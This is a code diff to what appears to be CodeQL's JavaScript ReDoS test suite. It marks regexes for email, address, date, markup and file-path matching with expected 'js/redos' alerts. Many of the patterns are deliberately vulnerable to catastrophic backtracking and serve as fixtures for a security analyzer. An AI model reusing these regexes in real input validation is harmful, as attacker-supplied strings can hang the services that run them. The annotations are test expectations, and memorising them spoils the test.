@@ -72,7 +72,7 @@ /^(\d{2}-\d{2})*$/g; /^(?:\([2-9]\d{2}\)\ ?|(?:[2-9]\d{2}\-))[2-9]\d{2}\-\d{4}$/g; /^[1-9]{1}[0-9]{3}\s?[A-Z]{2}$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; 
+/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js index 39d1669109e4..14468a515657 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js 
@@ -24,7 +24,7 @@ /((\d{2})|(\d))\/((\d{2})|(\d))\/((\d{4})|(\d{2}))/g; /^((0[1-9])|(1[0-2]))$/g; /^(\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)$/g; -/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; +/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; // $ Alert[js/redos] /^((31(?! (FEB|APR|JUN|SEP|NOV)))|((30|29)(?! FEB))|(29(?= FEB (((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00)))))|(0?[1-9])|1\d|2[0-8])-(JAN|FEB|MAR|MAY|APR|JUL|JUN|AUG|OCT|SEP|NOV|DEC)-((1[6-9]|[2-9]\d)\d{2})$/g; /^[0-9]{4}-(((0[13578]|(10|12))-(0[1-9]|[1-2][0-9]|3[0-1]))|(02-(0[1-9]|[1-2][0-9]))|((0[469]|11)-(0[1-9]|[1-2][0-9]|30)))$/g; /^([0]?[1-9]|[1][0-2])[./-]([0]?[1-9]|[1|2][0-9]|[3][0|1])[./-]([0-9]{4}|[0-9]{2})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js index a68c66d2fea8..f7ab34777169 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js 
@@ -1,16 +1,16 @@ -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] /(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})/g; /^((?>[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+\x20*|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*"\x20*)*(?<))?((?!\.)(?>\.?[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+)+|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*")@(((?!-)[a-zA-Z\d\-]+(?)$/g; /^\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,3}$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; -/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] +/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; // $ Alert[js/redos] /^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*\.(([0-9]{1,3})|([a-zA-Z]{2,3})|(aero|coop|info|museum|name))$/g; /(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\"))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\")))*)@(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\]))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\])))*)/g; /^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}$/g; /^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$/g; /^(([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+([;.](([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+)*$/g; /\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*([,;]\s*\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*)*/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; +/^[a-zA-Z]+(([\'\,\.\- 
][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; // $ Alert[js/redos] /^([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/g; /^\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$/g; /^[\w-]+(?:\.[\w-]+)*@(?:[\w-]+\.)+[a-zA-Z]{2,7}$/g; 
@@ -22,16 +22,16 @@ /^\W{0,5}[Rr]e:\W[a-zA-Z0-9]{1,10},\W[a-z]{1,10}\W[a-z]{1,10}\W[a-z]{1,10}/g; /^([\w\d\-\.]+)@{1}(([\w\d\-]{1,67})|([\w\d\-]+\.[\w\d\-]{1,67}))\.(([a-zA-Z\d]{2,4})(\.[a-zA-Z\d]{2})?)$/g; /^([\w\-\.]+)@((\[([0-9]{1,3}\.){3}[0-9]{1,3}\])|(([\w\-]+\.)+)([a-zA-Z]{2,4}))$/g; -/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; +/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; // $ Alert[js/redos] /^[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9]@[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9][\.][a-z0-9]{2,4}$/g; /(?(?![ ])(\w|[.])*@(\w|[.])*)/g; /\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$|^([0-9a-zA-Z'\.]{3,40})\*|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\.([0-9a-zA-Z']+)$|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\*+$|^$/g; /[\w-]+@([\w-]+\.)+[\w-]+/g; /^(?:[a-zA-Z0-9_'^&/+-])+(?:\.(?:[a-zA-Z0-9_'^&/+-])+)*@(?:(?:\[?(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\.){3}(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\]?)|(?:[a-zA-Z0-9-]+\.)+(?:[a-zA-Z]){2,}\.?)$/g; /^((?[a-z]:)|(\\\\(?[0-9]*[a-z\-][a-z0-9\-]*)\\(?[^\.\x01-\x1F\\""\*\?<>:|\\/][^\x01-\x1F\\""\*\?|><:\\/]*)))?(?(?(\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))?(?[\\/](\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))*)?[\\/]?$/g; -/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; 
+/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; // $ Alert[js/redos] +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] /^[\w-]+(\.[\w-]+)*@([a-z0-9-]+(\.[a-z0-9-]+)*?\.[a-z]{2,6}|(\d{1,3}\.){3}\d{1,3})(:\d{4})?$/g; /^[\w\.=-]+@[\w\.-]+\.[\w]{2,3}$/g; /^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js index 31edb6c76ddc..db5d45df0f74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js 
@@ -1,27 +1,27 @@ /<[^>]*\n?.*=("|')?(.*\.jpg)("|')?.*\n?[^<]*>/g; /<[^>]*>/g; -/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; +/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; // $ Alert[js/redos] /\xA9/g; /(?'DateLiteral' (?# Per the VB Spec : DateLiteral ::= '#' [ Whitespace+ ] DateOrTime [ Whitespace+ ] '#' ) \#\s* (?'DateOrTime' (?# DateOrTime ::= DateValue Whitespace+ TimeValue | DateValue | TimeValue ) (?'DateValue' (?# DateValue ::= Whitespace+ TimeValue | DateValue | TimeValue ) ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Day 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{1,4}) \s+ (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? 
) | ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Month 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{4}) ) | ( (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? ) ) ) \s*\# )/g; /(SELECT\s[\w\*\)\(\,\s]+\sFROM\s[\w]+)| (UPDATE\s[\w]+\sSET\s[\w\,\'\=]+)| (INSERT\sINTO\s[\d\w]+[\s\w\d\)\(\,]*\sVALUES\s\([\d\w\'\,\)]+)| (DELETE\sFROM\s[\d\w\'\=]+)/g; -/"([^"](?:\\.|[^\\"]*)*)"/g; +/"([^"](?:\\.|[^\\"]*)*)"/g; // $ Alert[js/redos] /href=[\"\'](http:\/\/|\.\/|\/)?\w+(\.\w+)*(\/\w+(\.\w+)?)*(\/|\?\w*=\w*(&\w*=\w*)*)?[\"\']/g; //g; /(?s)( class=\w+(?=([^<]*>)))|()|()|()|([^<]*<\/o:p>)|(]*>)|(<\/span>)|(font-family:[^>]*[;'])|(font-size:[^>]*[;'])(?-s)/g; -/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; +/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; // $ Alert[js/redos] /<(?.*).*>(?.*)<\/\k>/g; /<(\/{0,1})img(.*?)(\/{0,1})\>/g; /src[^>]*[^/].(?:jpg|bmp|gif)(?:\"|\')/g; -/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; +/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; // $ Alert[js/redos] /(?i:on(blur|c(hange|lick)|dblclick|focus|keypress|(key|mouse)(down|up)|(un)?load|mouse(move|o(ut|ver))|reset|s(elect|ubmit)))/g; /([^'("|')]*)("|')){1}|content\s*=\s*("|')(?[^'("|')]*)("|')|scheme\s*=\s*("|')(?[^'("|')]*)("|'))/g; /<\*?font # Match start of Font Tag (?(?=[^>]+color.*>) #IF\/THEN lookahead color in tag (.*?color\s*?[=|:]\s*?) 
# IF found THEN move ahead ('+\#*?[\w\s]*'+ # CAPTURE ColorName\/Hex |"+\#*?[\w\s]*"+ # single or double |\#*\w*\b) # or no quotes .*?> # & move to end of tag |.*?> # ELSE move to end of Tag ) # Close the If\/Then lookahead # Use Multiline and IgnoreCase # Replace the matches from RE with MatchEvaluator below: # if m.Groups(1).Value<>"" then # Return "" # else # Return "" # end if/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? # Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /^#?(([fFcC0369])\2){3}$/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; />(?:(?[^<]*))/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; 
@@ -34,26 +34,26 @@ /<([^\s>]*)(\s[^<]*)>/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /[0][x][0-9a-fA-F]+/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(?([^"']|"[^"]*")*)'(?.*)$/g; />(?:(?[^<]*))/g; /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; /\/\*[\d\D]*?\*\//g; /^#?([a-f]|[A-F]|[0-9]){3}(([a-f]|[A-F]|[0-9]){3})?$/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] //g; /("[^"]*")|('[^\r]*)(\r\n)?/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? 
# Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; /^#?(([fFcC0369])\2){3}$/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /[0][x][0-9a-fA-F]+/g; /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /^[^<>`~!/@\#}$%:;)(_^{&*=|'+]+$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js index db1e10df7386..550fff9a1225 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js @@ -1,7 +1,7 @@ /^\d{3}\s?\d{3}$/g; /^([a-zA-Z0-9@*#]{8,15})$/g; /^(?=.*\d).{4,8}$/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; +/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; // $ Alert[js/redos] /((\(\d{3}\) ?)|(\d{3}-))?\d{3}-\d{4}/g; /^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$/g; /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?!.*\s).{4,8}$/g; 
@@ -12,7 +12,7 @@ /[:]{1}[-~+o]?[)>]+/g; /^\d{5}(-\d{4})?$/g; /^([a-z0-9]{32})$/g; -/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /\u2122/g; /^[{|\(]?[0-9a-fA-F]{8}[-]?([0-9a-fA-F]{4}[-]?){3}[0-9a-fA-F]{12}[\)|}]?$/g; @@ -21,7 +21,7 @@ /^(([\w][\w\-\.]*)\.)?([\w][\w\-]+)(\.([\w][\w\.]*))?$/g; /^(eth[0-9]$)|(^eth[0-9]:[1-9]$)/g; /^((Fred|Wilma)\s+Flintstone|(Barney|Betty)\s+Rubble)$/g; 